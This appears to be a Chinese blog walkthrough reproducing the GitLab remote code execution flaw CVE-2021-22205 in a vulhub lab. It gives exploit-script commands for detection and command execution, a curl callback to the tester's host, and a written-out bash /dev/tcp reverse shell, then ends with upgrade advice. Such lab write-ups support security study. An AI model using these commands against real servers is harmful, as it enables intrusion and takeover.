GitLab 远程命令执行漏洞复现(CVE-2021-22205)

向右看齐 2023-10-06 20:31 17阅读 0赞

#### 目录 ####

*   *  一、漏洞描述
     *  二、影响版本
     *  三、环境搭建
     *  四、漏洞复现
     *   *  4.1、脚本复现
         *   *  4.1.1、下载利用脚本
             *  4.1.2、检测漏洞是否存在
             *  4.1.3、命令执行
             *  4.1.4、反弹shell
     *  五、解决方案

### 一、漏洞描述 ###

GitLab 没有正确验证传递给文件解析器的图像文件，这导致远程命令执行，可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解，漏洞编号CVE-2021-22205。

### 二、影响版本 ###

11.9 <=  GitLab（CE/EE）< 13.8.8
    13.9 <=  GitLab（CE/EE）< 13.9.6
    13.10 <= GitLab（CE/EE）< 13.10.3

### 三、环境搭建 ###

快速搭建，可以使用vulhub

git clone https://github.com/vulhub/vulhub.git
    cd vulhub/gitlab/CVE-2021-22205/
    docker-compose up -d

环境启动后，访问http://127.0.0.1:8080即可查看到GitLab的登录页面

### 四、漏洞复现 ###

#### 4.1、脚本复现 ####

##### 4.1.1、下载利用脚本 #####

https://github.com/Al1ex/CVE-2021-22205

##### 4.1.2、检测漏洞是否存在 #####

py CVE-2021-22205.py -v true -t http://192.168.30.56/

![在这里插入图片描述][watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16]

##### 4.1.3、命令执行 #####

首先起一个http服务

py -m http.server 1234

![在这里插入图片描述][266e6f56c07f418d8182475170c16ee8.png]  
然后命令执行

py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "curl http://192.168.8.14:1234/1.txt"

通过http服务端查看，命令执行成功  
![在这里插入图片描述][479ca645e867475181ba0e408ee50905.png]

##### 4.1.4、反弹shell #####

#写入反弹shell脚本
    py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "echo 'bash -i >& /dev/tcp/192.168.8.14/6666 0>&1' > /tmp/1.sh"
    #赋予shell脚本执行权限
    py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "chmod +x  /tmp/1.sh"
    #服务器监听6666端口
    nc64.exe -lvnp  6666
    #获取git权限
    py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "/bin/bash /tmp/1.sh"

![在这里插入图片描述][watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16 1]  
![在这里插入图片描述][watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16 2]

### 五、解决方案 ###

升级到最新版本。

要更新 GitLab，请参阅更新页面。要更新 Gitlab Runner，请参阅更新 Runner 页面。

参考：  
https://www.freebuf.com/articles/web/303375.html  
https://github.com/Al1ex/CVE-2021-22205

[watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16]: https://img-blog.csdnimg.cn/d6cac473887c4020bdc3c43a85755a69.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16
[266e6f56c07f418d8182475170c16ee8.png]: https://img-blog.csdnimg.cn/266e6f56c07f418d8182475170c16ee8.png
[479ca645e867475181ba0e408ee50905.png]: https://img-blog.csdnimg.cn/479ca645e867475181ba0e408ee50905.png
[watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16 1]: https://img-blog.csdnimg.cn/10108b54b0034bae9fc3e4436ba50bda.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16
[watermark_type_d3F5LXplbmhlaQ_shadow_50_text_Q1NETiBAQmlnJkJpcmQ_size_20_color_FFFFFF_t_70_g_se_x_16 2]: https://img-blog.csdnimg.cn/bdf87744edfd413880d6b665fce8febc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQmlnJkJpcmQ=,size_20,color_FFFFFF,t_70,g_se,x_16